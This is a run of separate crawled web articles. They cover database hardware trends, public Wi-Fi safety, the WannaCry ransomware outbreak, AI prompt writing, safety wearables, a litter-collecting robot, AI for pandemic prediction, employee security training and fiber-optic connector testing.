TPM: What happens when these persistent memory technologies, such as 3D XPoint or ReRAM, come into the mix?
Michael Stonebraker: I don’t see these are being that disruptive because all of them are not fast enough to replace main memory and they are not cheap enough to replace disks, and they are not cheap enough to replace flash. Now, it remains to be seen how fast 3D XPoint is going to be and how cheap it is going to be.
I foresee databases running on two-level stores and three-level stores, but I doubt they will be able to manage four-level stores because it is just too complicated to do the software. But there will be storage hierarchies and exactly what pieces will be in the storage hierarchy is yet to be determined. Main memory will be at the top and disk will be at the bottom, we know that, and there will be stuff in between for general purpose systems. For OLTP systems, there are going to be in main memory, end of story, and companies like VoltDB and MemSQL are main memory SQL engines that are blindingly fast.
The interesting thing to me, though, is that business intelligence is going to be replaced by data science as soon as we can train enough data scientists to do it. Business intelligence is SQL aggregates with a friendly face. Data science is predictive analytics, regression, K means clustering, and so on, and it is all essentially linear algebra on arrays. How data science is getting integrated into database systems is the key.
Right now, it is the wild west. The thing that is popular now is Spark, but it is disconnected from data storage completely. So one option is that data science will just be applications that are external to a database system.
Another option is that array-based database systems will become popular, and SciDB, TileDB, and Rasdaman are three such possibilities. It is not clear how widespread array databases will be, but they will certainly be popular in genomics, which is all using array data.
The other option is that the current data warehousing vendors will allow users to adopt data science features. They are already allowing user-defined functions in R. It remains to be seen what is going to happen to Spark – whatever it is today, it is going to be different tomorrow. So in data science, it is the wild west.
TPM: We talked about different technologies and how they might plug into the storage hierarchy. But what about the compute hierarchy? I am thinking about GPU-accelerated databases here specifically, such as MapD, Kinetica, BlazingDB, and Sqream.
Michael Stonebraker: This is one of the things that I am much more interested in. If you want to do a sequential scan or a floating point calculation, GPUs are blindingly fast. The problem with GPUs is if you get all of your data within GPU memory, they are really fast, otherwise you have to load it from somewhere else, and loading is the bottleneck. On small data that you can load into GPU memory, they will definitely find applications at the low end where you want ultra-high performance. The rest of the database space, it remains to be seen how prevalent GPUs are going to be.
The most interesting thing to me is that networking is getting faster at a pace that is higher than CPUs are getting beefier and memory is getting faster. Essentially all multi-node database systems have been designed under the premise that networking is the bottleneck. It turns out that no one can saturate 40 Gb/sec Ethernet. In point of fact, we have moved from 1 Gb/sec to 40 Gb/sec Ethernet in the past five years, and over that same time, clusters on the order of eight nodes have become somewhat faster, but nowhere near a factor of 40X, and memory is nowhere near this, either. So networking is probably not the bottleneck anymore.
TPM: Certainly not with 100 Gb/sec Ethernet getting traction and vendors demonstrating that they can deliver ASICs that can drive 200 Gb/sec or even 400 Gb/sec within the next year or two.
Michael Stonebraker: And that means essentially that everybody gets to rethink their fundamental partitioning architecture, and I think this will be a big deal.
TPM: When does that inflection point hit, and how much bandwidth is enough? And what does it mean when you can do 400 Gb/sec or even 800 Gb/sec, pick your protocol, with 300 nanosecond-ish latency?
Michael Stonebraker: Let’s look at Amazon Web Services as an example. The connections at the top of the rack are usually 10 Gb/sec. Figure it to be 1 GB/sec. There is a crosspoint between the nodes is infinitely fast by comparison. So fast can you get stuff out of storage? If it is coming off disk, every drive is 100 MB/sec, so ten of these ganged in parallel in a RAID configuration will just barely able to keep up. So the question is how fast is storage relative to networking.
My general suspicion is that networking advances will make it at least as beefy as the storage system, at which point database systems will not be network bound and there will be some other bottleneck. If you are doing data science, that bottleneck is going to be the CPU because you are doing a singular value decomposition, and that is a cubic operation relative to the number of cells that you look at. If you are doing conventional business intelligence, you are likely going to be storage bound, and if you doing OLTP you are already in main memory anyway.
With OLTP, if you want to do 1 million transactions per second, it is no big deal. Your favorite cluster will do that on things like VoltDB and MemSQL. Oracle, DB2, MySQL, SQL Server and the others can’t do 1 million transactions per second no matter what. There is just too much overhead in the software.
A bunch of us wrote a paper back in 2009, and we configured an open source database system and measured it in detail, and we assumed that all of the data fit in main memory. So basically everything is in the cache. And we wanted to measure how costly the different database functions were. In round numbers, managing the buffer pool was a big issue. The minute you have a buffer pool, then you have to get the data out of it, convert it to main memory format, operate on it, and then put it back if it is an update and figure out which blocks are dirty and keep an LRU list and all this stuff. So that is about a third of the overhead. Multithreading is about another third of the overhead, and database systems have tons of critical sections and with a bunch of CPUs, they all collide on critical sections and you end up just waiting. Writing the log in an OLTP world is like 15 percent, and you have to assemble the before image and the after image, and write it ahead of the data. So maybe 15 percent, with some other additional overhead, is actual useful work. These commercial relational databases are somewhere between 85 percent and 90 percent overhead.
To get rid of that overhead, you have to rearchitect everything, which is what the in-memory OLTP systems have done.
TPM: By comparison, how efficient are the array databases, and are they the answer for the long haul? Or are they not useful for OLTP systems?
Michael Stonebraker: Absolutely not. I wrote a paper over a decade ago explaining that one size database does not fit all, and my opinion has not changed at all on this.
It turns out that if you want to do OLTP, you want a row-based memory store, and if you want to do data warehousing, you want a disk-based column store. Those are fundamentally different things. And if you want to do data science, you want an array-based data model, not a table-based data model, and you want to optimize for regression and singular value decomposition and that stuff. If you want to do text mining, none of these work well. I think application-specific database systems for maybe a dozen classes of problems is going to be true as far as I can see into the future.
TPM: What about data stores for machine learning? The interesting thing to me is that the GPU accelerated database providers are all talking about how they will eventually support native formats for machine learning frameworks like TensorFlow. In fact, TensorFlow is all that they seem to care about. They want to try to bridge fast OLTP and machine learning on the same database platform.
Michael Stonebraker: So back up a second. Machine learning is all array-based calculation. TensorFlow is an array-oriented platform that allows you to assemble a bunch of primitive array operations into a workflow. If you have a table-based system and an array that is 1 million by 1 million, which is 1 trillion cells, if you store that as a table in any relational system, you are going to store three columns or one row and then another that has a huge blob with all of the values. In an array-based system, you store this puppy as an array, and you optimize storage that it is a big thing in both directions. Anybody who starts with a relational engine has got to cast tables to arrays in order to run TensorFlow or R or anything else that uses arrays, and that cast is expensive.
TPM: How much will that hinder performance? I assume it has to one at least one of the workloads, relational or array.
Michael Stonebraker: Let me give you two different answers. If we have a dense array, meaning that every cell is occupied, then this is going to be an expensive conversion. If we have a very sparse array, then encoding a sparse array as a table is not a bad idea at all. So it really depends on the details and it is completely application dependent, not machine learning framework dependent.
This comes back to what I was saying earlier: it is the wild west out there when it comes to doing data science and storage together.
TPM: So your answer, it would seem, is to use VoltDB on OLTP and SciDB on arrays. Are you done now?
Michael Stonebraker: Data integration seems to be a much bigger Achilles’ heel to corporations, and that is why I am involved with a third startup called Tamr, which was founded in 2013.
One of Tamr’s customers is General Electric, which has 75 different procurement systems, perhaps considerably more – they don’t really know how many they have got. The CFO at GE concluded that if these procurement systems could operate in tandem and demand most favored nation status with vendors, that would be worth about $1 billion in savings a year to the company. But they have to integrate 75 independently constructed supplier databases.
TPM: The presumption with tools like Tamr is that it is much easier to integrate disparate things than to try to pour it all into one giant database and rewrite applications or at least pick only one application.
Michael Stonebraker: Exactly. Enterprises are hugely siloed because they divide into business units so they can get stuff done, and integrating silos for the purposes of cross selling or aggregate buying or social networking, or even getting a single view of customers, is a huge deal.
Editor’s Note: Michael Stonebraker is the recipient of the 2014 ACM Turing Award for fundamental contributions to the concepts and practices underlying modern database systems. The ACM Turing Award is one of the most prestigious technical awards in the computing industry, and the Association for Computing Machinery (ACM) invites us to celebrate the award and computing’s greatest achievements. More activities and information on the ACM Turing Award may be found at http://www.acm.org/turing-award-50. | <urn:uuid:510201d8-4ea0-4c24-bc8f-f9dfe64345da> | CC-MAIN-2024-38 | https://www.nextplatform.com/2017/08/15/hardware-drives-shape-databases-come/ | 2024-09-17T23:09:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00523.warc.gz | en | 0.957725 | 3,427 | 2.65625 | 3 |
Open Public Wi-Fi: How To Stay Safe
One day our systems will be built to default always to secure configurations, but we're not there yet
Using open public Wi-Fi networks is dangerous business; if you're not careful, your communications are open to everyone else on the network. But there are ways to protect yourself. If you have the option, you should use an encrypted network. In the alternative, if you use an open, unencrypted network, use a virtual private network to protect your communications. Failing even that, be sure to use only HTTPS sessions.
When you look at a list of available Wi-Fi networks, like the one nearby, there are basically two types: those that are encrypted (with the lock icon) and those that are unencrypted.
If you connect to an unencrypted network all of your traffic is open for all the world to see, unless you take other measures to encrypt it. On such a network, all users can see all other users' traffic. Worse still, other users can hijack your session and communicate with the website you were on as if they were you, or redirect your computer to a site you didn't intend to visit. These attacks, while not strictly new at the time, were made widely known by the release of Firesheep, which made it easy to do.
Read the full article here.
Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.
About the Author
You May Also Like
State of AI in Cybersecurity: Beyond the Hype
October 30, 2024[Virtual Event] The Essential Guide to Cloud Management
October 17, 2024Black Hat Europe - December 9-12 - Learn More
December 10, 2024SecTor - Canada's IT Security Conference Oct 22-24 - Learn More
October 22, 2024 | <urn:uuid:f2360e4e-5340-45eb-9f61-0bcc13dab9c2> | CC-MAIN-2024-38 | https://www.darkreading.com/cyber-risk/open-public-wi-fi-how-to-stay-safe | 2024-09-09T11:28:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00423.warc.gz | en | 0.955827 | 390 | 2.53125 | 3 |
The WannaCry ransomware attack was the end result of years of ignorance on the part of governments, private-sector firms, and the public regarding how serious cyber threats have become.
The 2016 Shadow Brokers NSA hack came home to roost in a big way last week, when a code execution vulnerability contained in the Shadow Brokers WikiLeaks dump was used to launch the largest ransomware attack in history. The WannaCry ransomware strain, also known as WannaCrypt, Wana Decryptor, and WCry, hit hundreds of thousands of computers in 150 countries before it was halted – temporarily – when a security analyst stumbled upon a “kill switch” in the code. However, even the analyst who discovered the kill switch emphasized that the fix was, indeed, temporary; reports of new variants are emerging, and the kill switch does nothing to help the armies of machines that have already been infected.
WannaCry wreaked havoc on companies in numerous industry sectors, including French car manufacturer Renault and Spanish telecommunications giant Telefonica, but perhaps the most stark illustration of the damage was what it did to Britain’s National Health Service (NHS). The Guardian reports that 45 NHS facilities were infected, forcing hospitals to redirect ambulances, postpone treatments for cancer patients, and warn patients of delays overall.
Organizations in the U.S. were fortunate; a Department of Homeland Security spokesperson told NPR that the number of WannaCry ransomware victims stateside was “very small.” But that’s only because of luck – and luck eventually runs out.
WannaCry Ransomware Took Advantage of Old, Unsupported Systems
The WannaCry ransomware nearly exclusively impacted enterprise machines, not home computers, because the latter are more likely to be running updated operating systems, and WannaCry exploits a vulnerability in Windows XP up through Windows Server 2012. Microsoft released a patch for the newer end of that range in March, but the company stopped supporting some of the older systems in the group, including Windows XP and Windows 2000, years ago. After the WannaCry attack, Microsoft took the highly unusual step of issuing an “emergency patch” for Windows XP, Windows 8, and Windows Server 2003.
As soon as WannaCry hit, the buck-passing commenced. The British media attacked the government for not sufficiently funding the NHS. Microsoft criticized the NSA for not properly securing its cyber-weaponry. Meanwhile, Microsoft itself came under fire for not issuing security updates for legacy systems that it knew were still in wide use. Security experts reiterated the age-old warnings to organizations about keeping their systems updated and engaging in proactive measures to prevent attacks like WannaCry.
Do We Have Your Attention Now?
The WannaCry ransomware attack shouldn’t have surprised anyone. Cyber security experts have been warning about large-scale attacks on critical infrastructure for years, and there have been numerous smaller-scale ransomware attacks on U.S. emergency services. The only surprising things are that it took so long for something like this to happen, and that the United States was not hit as hard as the rest of the world, particularly since preliminary evidence indicates that WannaCry may be the work of the same North Korean hackers who were behind the Sony Pictures email hack and last summer’s SWIFT network attack on a bank in Bangladesh.
American healthcare facilities are plagued with the same cyber security problems as the NHS, including antiquated legacy systems and an unwillingness on the part of organizations to invest in proactive cyber security measures. Other industries aren’t doing that much better, including the government. After all, the exploit that started all of this was stolen from an American spy agency. If the NSA cannot properly secure its systems, what does that say about everyone else?
The WannaCry attacks are the natural end result of the government, private-sector organizations, and the public engaging in reactive cyber security at best, and remaining ignorant of cyber security at worst. Mere days before WannaCry hit, the Trump Administration issued an executive order commanding the federal government to get its cyber security house in order. Private-sector organizations and, yes, individuals need to do the same. Everyone needs to be aware of the seriousness of engaging in proactive cyber security best practices and the severe potential consequences of not doing so.
Thanks to WannaCry, everyone now knows what ransomware is and what it’s capable of doing. The question is, what are we going to do with this information?
The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.
Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems. | <urn:uuid:95106aa3-5c3e-4a84-8fa3-a6ce333109c1> | CC-MAIN-2024-38 | https://lazarusalliance.com/wannacry-ransomware/ | 2024-09-10T18:22:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00323.warc.gz | en | 0.94207 | 1,041 | 2.578125 | 3 |
How to Create Great Prompts for Great AI Responses
AI (artificial intelligence) is everywhere, but one common misconception is that AI can read your mind, as AI can only act on the information it is given. This is why crafting a well-architected prompt is crucial.
A good prompt ensures that the AI understands your needs and delivers the best possible response. Here, we’ll explore the four key components of a prompt: Clear Objective, Contextual Information, Desired Format, and Tone and Style.
1. Clear Objective
The first step in creating a good prompt is to define a clear objective. What do you want the AI to accomplish? Whether it’s generating a blog post, answering a question, or providing a summary, having a specific goal in mind helps the AI focus on delivering relevant and accurate results. For example, instead of asking, “Tell me about AI,” you could ask, “Explain how AI is used in healthcare to improve patient outcomes.”
2. Contextual Information
Providing contextual information is essential for the AI to understand the background and nuances of your request. This includes any relevant details, such as the target audience, specific examples, or any constraints. Context helps the AI tailor its response to your needs. For instance, if you’re asking for a marketing strategy, mentioning the industry, target market, and current challenges will yield a more useful response.
3. Desired Format
Specifying the desired format of the response ensures that the AI delivers information in a way that meets your expectations. Whether you need a list, a detailed explanation, a summary, or a step-by-step guide, clearly stating the format helps the AI structure its output accordingly. For example, you might say, “Provide a bullet-point list of the benefits of renewable energy.”
4. Tone and Style
The tone and style of the response can significantly impact its effectiveness. Whether you prefer a formal, professional tone or a casual, conversational style, specifying this in your prompt helps the AI match your desired communication style. For example, you could request, “Write a friendly and engaging introduction to a blog post about sustainable living.”
Get the Most from Your AI
Creating a good prompt for AI is all about clarity and precision. By defining a clear objective, providing contextual information, specifying the desired format, and indicating the tone and style, you can ensure that the AI understands your needs and delivers the best possible response. Remember, AI can’t read your mind, but with a well-crafted prompt, it can come pretty close to understanding exactly what you need.
Microsoft Practice Director
The healthcare industry is facing unprecedented challenges, with labor shortages projected to reach 10 million globally by 2030. This shortage, combined with the pressures experienced in recent years, has resulted in a significant increase in clinician burnout, with...
As organizations increasingly embrace remote work and digital transformation, cloud computing solutions have become essential. Among the most prominent options in the virtual desktop infrastructure (VDI) landscape are Windows 365 (W365) and Azure Virtual Desktop...
In a Borderless World, Network Security is Still Foundational to an Effective Cybersecurity Strategy
As cyberthreats continue to escalate, securing network infrastructure still remains a cornerstone of an effective cybersecurity strategy. Here’s a look at why network infrastructure security is essential and how it underpins a robust cybersecurity framework. 1.... | <urn:uuid:28925b88-0474-43ae-b173-93ff2f85f21c> | CC-MAIN-2024-38 | https://anm.com/blog/how-to-create-great-prompts-for-great-ai-responses/ | 2024-09-13T05:20:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00123.warc.gz | en | 0.887641 | 713 | 2.578125 | 3 |
March 21, 2017
According to the most recent data from the International Labor Organization, every 15 seconds a worker dies from a work-related accident or disease. On top of 2.3 million deaths per year from occupational accidents, over 313 million workers suffer non-fatal work injuries. The great human cost also has an economic impact: For employers, on-the-job accidents cost billions of dollars annually due to production downtime and workers’ compensation fees.
Can technology help prevent work-related accidents and diseases? The majority of workplace injuries are easily preventable through real-time monitoring of workers. After all, connected workers – aware of (and sensed by) their environment through IoT technologies – are inherently safer.
Wearable technology can greatly improve workplace safety. For example,
- Smart bands and sensors embedded in clothing and gear can be used to monitor workers’ health and wellbeing by tracking such factors as heartrate, respiration, heat stress, fatigue and exposure. Notifications can be sent to workers’ wearable devices when critical levels are reached.
- Machine and environmental sensors can provide contextual information to field workers to help keep them informed and aware of their surroundings; and wearable GPS tracking can ensure they keep out of hazardous areas.
- Smart glasses and other HUDs allow employees to access work instructions and manuals in the field, in addition to enabling remote guidance. This aids their productivity and makes them safer, since accuracy (doing a job correctly) and safety go hand-in-hand.
- Camera-equipped wearables can also be used to document a job or incident for later review. Such data can be utilized for safety training and to identify safety issues in the work environment.
In addition to providing real-time safety information and alerts to workers, wearable devices make for a safer workplace simply by the way in which they are used, i.e. hands-free. There are some great real-world use cases of wearable technology for environmental health and safety. Read on to learn how three major enterprises are using wearables of different form factors to augment their safety efforts:
North Star Bluescope Steel
This steel producer is working with IBM on developing a cognitive platform that taps into IBM Watson Internet of Things technology to keep employees safe in dangerous environments.
The IBM Employee Wellness and Safety Solution gathers and analyzes sensor data collected from smart helmets and wristbands to provide real-time alerts to workers and their managers. If a worker’s physical wellbeing is compromised or safety procedures aren’t being followed, preventative measures can be taken.
North Star is using the solution to combat heat stress, collecting data from a variety of sensors installed to continuously monitor a worker’s skin body temperature, heart rate, galvanic skin response and activity level, along with the temperature and humidity of the work environment. If temperatures rise to unsafe levels, the technology provides safety guidelines to each employee based upon his or her individual metrics. For instance, the solution might advise an at-risk worker to take a 10-minute break in the shade.
With the IBM Employee Wellness and Safety Solution, data flows from the worker to the IBM Watson IoT platform and then to a supervisor for intervention/prevention. Watson can detect hazardous combinations from the wearable sensor data, like high skin temperature plus a raised heart rate and lack of movement (indicating heat stress,) and notify the appropriate person to take action. This same platform could be used to prevent excessive exposure to radiation, noise, toxic gases and more.
John Deere, best known as a manufacturer of agricultural equipment and machinery, is using Virtual Reality headsets to evaluate and assess the “assembly feasibility” of new machine designs. Performing ergonomic evaluations in VR improves the safety of production employees by revealing the biomechanics of putting a proposed machine together. High risk processes can be identified and corrected before they pose a problem for the assembler on the shop floor.
In one of these VR reviews at John Deere, an operator puts on a headset and becomes completely immersed in a virtual production environment. Reviewers can see what the operator sees, and determine whether a potential design is safe to manufacture. They can see all the safety aspects that would go into assembling the product, including how the worker’s posture would be affected, whether there is chance of physical injury, what kinds of tools would be required, etc.
John Deere believes VR-aided design evaluations can result in less fatigue, fewer accidents, and greater productivity for its manufacturing team, and the method has already proven effective in reducing injuries at the company. Learn more about this use case at EWTS 2017, where Janelle Haines, Ergonomic Analyst and Biomedical Engineer at John Deere, will participate in an interactive workshop on “Leveraging Virtual Reality in the Enterprise.”
The electricity and gas utility company is exploring wearable tech for lone worker health and safety. National Grid believes wearables can have multiple advantages in the workplace, including improving safety as well as speeding up the process of repairs and reducing costs. The ngLabs team is responsible for looking at the latest technologies; in one of its first projects, the team is focusing on the critical worker:
The project uses interactive wristbands developed by Microsoft to monitor the health, safety and wellbeing of workers who operate alone or remotely. The smart bands track location, measure vital statistics like heart rate, and enable remote/lone workers to send a signal to colleagues when they’ve arrived on site or checked out without having to make a call or fill out paperwork. Information is captured quickly, making it easier to spot problems and send alerts if something goes wrong.
Hear more about this use case in San Diego this May—David Goldsby, Technology Innovation Manager at National Grid, will present a case study on “Digital Disruption and Consumerization in Utilities” at EWTS ’17. | <urn:uuid:6cbb3424-06a4-439f-9e5a-73309a08c9a6> | CC-MAIN-2024-38 | https://www.brainxchange.com/blog/3-great-use-cases-of-wearable-tech-for-ehs | 2024-09-13T04:47:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00123.warc.gz | en | 0.938468 | 1,206 | 2.84375 | 3 |
Robotic Jellyfish Designed to Target Ocean Pollution
The underwater robot collects trash as it swims
A jellyfish-inspired underwater robot could be an answer to the ongoing problem of global ocean pollution.
Designed by a team from the Max Planck Institute for Intelligent Systems (MPI-IS), the Jellyfish-Bot collects waste as it moves through the water, creating a vortex of air beneath its body that enables contactless collection and protects the potentially delicate ecosystems around it.
The design is also near-silent, providing a less invasive waste collection tool than other robotic solutions currently available.
The team used electrohydraulic actuators to design the robot’s body, which actlike artificial muscles. Electric currents flow through the actuators, powering the robot’s movement by expanding and contracting its ‘muscles’.
"When a jellyfish swims upwards, it can trap objects along its path as it creates currents around its body,” said Tianlu Wang, first author of the study. “In this way, it can also collect nutrients. Our robot too circulates the water around it. This function is useful in collecting objects such as waste particles. It can then transport the litter to the surface, where it can later be recycled.”
According to Wang, the robot could also be used to collect fragile biological samples such as fish eggs, transporting them to the surface for collection.
"Seventy percent of marine litter is estimated to sink to the seabed,” said Hyeong-Joon Joo, study co-author. “Plastics make up more than 60% of this litter, taking hundreds of years to degrade. Therefore, we saw an urgent need to develop a robot to manipulate objects such as litter and transport it upwards. We hope that underwater robots could one day assist in cleaning up our oceans."
Jellyfish-Bot has also been given the capacity to grasp and hold objects, with arms that are integrated into the design.
"We achieved grasping objects by making four of the arms function as a propeller, and the other two as a gripper,” said Joo. “Or we actuated only a subset of the arms, in order to steer the robot in different directions. We also looked into how we can operate a collective of several robots. For instance, we took two robots and let them pick up a mask, which is very difficult for a single robot alone. Two robots can also cooperate in carrying heavy loads. However, at this point, our Jellyfish-Bot needs a wire. This is a drawback if we really want to use it one day in the ocean."
Next, the team said it hopes to develop Jellyfish-Bot to be wireless and further improve its navigation and operational capabilities.
About the Author
You May Also Like | <urn:uuid:d0c2230f-b6cf-428b-ab09-861f28e6c49e> | CC-MAIN-2024-38 | https://www.iotworldtoday.com/robotics/robotic-jellyfish-designed-to-target-ocean-pollution | 2024-09-14T09:45:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.22/warc/CC-MAIN-20240914093425-20240914123425-00023.warc.gz | en | 0.961594 | 587 | 3.78125 | 4 |
Can AI spot the next pandemic before it starts?
Zoonosis, as defined by the World Health Organization (WHO), can transmit infectious diseases from wild animals to humans – diseases that can be deadly enough to cause pandemics. The principal reasons for transmission are the increasing human encroachment on animal habitats, changing climate, and the increased movement of people, animals, and animal products because of international trade. The Global Virome Project estimates around 1.7 million animal viruses are known to cause infections in birds and mammals. Scientists believe almost half of those viruses can spread to humans. Understanding these has now become key to preventing pandemics or at least being better prepared in case one hits us.
Research of this kind is an unbelievably huge task and has led to the development of a new discipline where machine learning (ML) and statistical models are used to predict the emergence of various diseases, likely animal hosts, geographical hotspots, and which viruses are most likely to affect humans. Scientists who support this technology firmly believe that the findings will guide the development of medicines and vaccines, and help everyone involved to study, observe, and predict situations accurately.
Naturally, all researchers do not agree with this approach. Many do not believe predictive technology can keep up with the frequently changing virome or the scale of what exists at any given point. True, there is a constant improvement of data and artificial intelligence (AI) models, but for such tools to be truly predictive of future pandemics, the efforts must include a very wide network of researchers spread across the globe.
AI spotted the first signs of Covid-19
Canada-based Bluedot was one of the first organisations to recognise the emergence of the Covid-19 pandemic and sound the alarm. It uses an AI-based algorithm that continuously searches global data to pinpoint the next outbreak of an infectious disease. HealthMap, the algorithm run at the Boston Children’s Hospital, also caught these first signs of Covid-19. So was the case with Mayo Clinic’s Coronavirus Map Tracking Tool.
Rapidly developing Natural-language processing (NLP) algorithms monitor global healthcare reports and news outlets in various languages, and flag mentions of diseases such as Covid-19, or endemic ones such as tuberculosis or HIV. Air-travel data is also monitored to assess the risks of spreading. Social media was found to be quite a reliable source of data during Covid-19. Data scientists at the University of Colorado, Boulder, used ML and a short-term forecasting model to analyse large datasets gathered from popular online platforms and compared the results to insights obtained from analysing the more conventional mobile device location data. As people travelled during the pandemic, or recovered and talked about their Covid experience, the technology recognised specific keywords and gathered relevant data. In 2021, when mask-wearing policies, lockdowns, and travel restrictions kept changing, this model was found to be far closer to reality than other models.
Early buzz but not much later
However, after that initial buzz, AI could not do much. Almost all AI models were weak when applied to real-world clinical settings. Deep-learning models, when applied to CT scans and chest x-rays, were found to be unsuccessful. Perhaps a major reason for these failures was that the AI models were working on a real pandemic for the first time. Four areas were identified as the primary roadblocks: imperfect datasets, human failures, automated discrimination, and complex global conditions.
Researchers are hopeful that the disappointments during Covid-19 will pave the way to generate better and sturdier AI models.
For AI models to predict the emergence of a pandemic, the primary requirement is large amounts of reliable datasets, which is not always easy to gather. Different institutes across different countries have varying policies about sharing healthcare data. Further, individuals may not want their data shared either, even anonymously. For all the aspects to come together, leaders in healthcare, government, and businesses must be on the same page about privacy issues. AI models are only as good as the data they work on. So, given the many barriers to collecting good datasets, the predictions during Covid-19 were understandably below par.
Data entry errors because of tremendous pressure, insufficient manpower, hurry to reach conclusions, and wrong incentives – everything was at play during Covid-19. The inability of people in charge to interpret data and AI predictions correctly was another common error.
Predictions and decisions regarding treatment taken by healthcare authorities also affected recovery rates despite the availability of AI models. Many disadvantaged groups did not receive appropriate or poor treatment because of AI biases, which can again be traced to human biases.
Complex global conditions
As mentioned earlier, data sharing is governed by different rules in different countries and that affects the quality and quantity of reliable data available. During the pandemic, there were many discussions and debates about sharing genome sequences across countries. Populations of different countries also reacted differently to the idea of sharing health data.
Prediction, diagnosis, and treatment are the three areas where AI can be best used. For AI models to learn and predict efficiently, a few factors must be corrected over time.
- Find better healthcare datasets, preferably in standardised formats, to create a centralised repository of data. Consider using synthetic data instead of real data to bypass the principles of privacy. New data processing techniques must be developed.
- Ensure greater diversity in the data collected. This will prevent automated discrimination and underrepresentation of disadvantaged groups.
- Promote greater cooperation across teams such as AI teams, researchers, clinicians, engineers, and even ethicists to ensure AI systems are aligned with the existing value systems.
- International data sharing rules must be outlined to facilitate data sharing without breaking any privacy rules. AI teams must be trained to recognise differences in data gathered from different regions of the world.
The fast spread of Covid globally and the struggle faced by health services to stay ahead of the disease pushes home the need to use the best AI models available to track and predict pandemics. AI developers must continue working on predictive models to ensure that the next pandemic, if any, can be preemptively predicted and contained at the right time.
This blog was first published on Business Insider | <urn:uuid:4569bc71-9c98-464b-85e5-ce4f9353504e> | CC-MAIN-2024-38 | https://www.infosysbpm.com/blogs/business-transformation/can-ai-spot-the-next-pandemic-before-it-starts.html | 2024-09-18T02:39:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00623.warc.gz | en | 0.957525 | 1,279 | 3.71875 | 4 |
When we talk about cybersecurity, we tend to think first of anti-virus programs and maybe even adblockers. The weakest link, though, is not software or hardware. The weakest link is always the human element; more than half of security incidents can be linked to an employee who does something negative or who simply makes a mistake. The phrase “human firewall” is starting to come into use, and it refers to various methods that can be used to plug that weak spot. Primarily, this means education; employees and users need to learn to think about security and pay attention to the areas in which they are vulnerable. No amount of money invested into hardware and software can make up for weaknesses in training.
So, what do your employees need to know? All employees need to take part in cybersecurity training. This doesn’t have to be that expensive; it can include regular memos reminding people not to click on links in unsolicited email messages, cheat sheets on how to make a strong password, etc. Making it creative and fun can help people remember what to do. Quizzes, for example, can help people remember the rules. They also help to train employees about protecting their own data and identity, so that they understand that the importance of cybersecurity goes into daily life. Then, work with them on applying the following tools to create a strong human firewall:
- Strong passwords. Pass phrases are the best, but not all systems are compatible with them. Ban employees from using common passwords such as “password” or even “passw0rd” (number substitution is unhelpful). Secure password checkers are available, although be aware that they tend to say a password is stronger than it is. If employees have difficulty remembering passwords, encourage them to use mnemonics or use a password manager (so they only have to remember the master password). Do not allow passwords to be put on monitors or cubicle walls.
- Require regular password changing and train employees to change their passwords majorly rather than, say, from “jane01” to “jane02.” Implementing code that prevents tight password rotation can also help (for example, if passwords are changed every 30 days, disallow the use of the same password within six months to prevent employees from doing “Password 347” “Password 365” “Password 347”). These techniques are all used because passwords are hard to remember; so, again, talk about mnemonics and other ways to make memorizing passwords easier.
- Train employees in an ongoing manner on cyber security. Employees should never click on links in emails unless they are very sure of the source and were expecting the email. Teach people about email spoofing (in which cyber criminals make an email appear to be from a trusted source) and phishing. Phishing drills (sending employees fake emails and seeing whether they click on the link, ignore the mail, or report it) can be very helpful. Also talk to employees about installing software from unknown sources and visiting potentially dangerous sites such as torrents. Employees who breach protocols should be disciplined in a fair and constructive manner (malice is grounds for termination, but stupidity and ignorance can generally be fixed).
- Develop security protocols that are seamless and as close as possible to invisible to the end user. Employees will resent protocols that make them feel restricted or spied on (for example, if you are using device wiping software, especially on their own devices, you should consider very carefully how and when it is implemented and how to keep employees in the loop and in control).
The most important aspect of building a strong human firewall is continuing education and training. Proper training can turn all of your employees, not just IT administrators, into cybersecurity heroes. It can also help them be safer and more secure in their own lives. | <urn:uuid:575ecf60-68e5-48c2-bd72-0568993978cf> | CC-MAIN-2024-38 | https://www.accessoneinc.com/blog/human-firewall-make-your-employees-cybersecurity-heroes/ | 2024-09-20T14:26:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00423.warc.gz | en | 0.955251 | 791 | 3.234375 | 3 |
by Charles Lohrmann
An interferometer can provide the most accurate, detailed testing of connectors, and is also an effective in-the-field troubleshooting tool.
When viewing an Optical Time Domain Reflectometer (OTDR) trace, you encounter high attenuation at a connected pair—a fault. You may also encounter a ghost, which is a large reflective event at a point in the passive fiber link where there is a change in media (index of refraction). This occurs at the connector or the end of the fiber—the change from glass to air.
Provided the OTDR is properly set up for the test, the ghost shows the location of the fault. But an interferometer can determine which connector is defective.
In this article, we'll discuss how an interferometer can take OTDR testing to the next level, accurately measuring the radius of connector curvature, offset of polish, and fiber height.
In the change from glass to air, energy reflected back to the OTDR is of such intensity that the light pulse is reflected off of the connector at the OTDR and is again returned a second time. As the OTDR converts the travel time of the light pulse into distance, the reflective event is painted on the screen a second time—thus, a ghost.
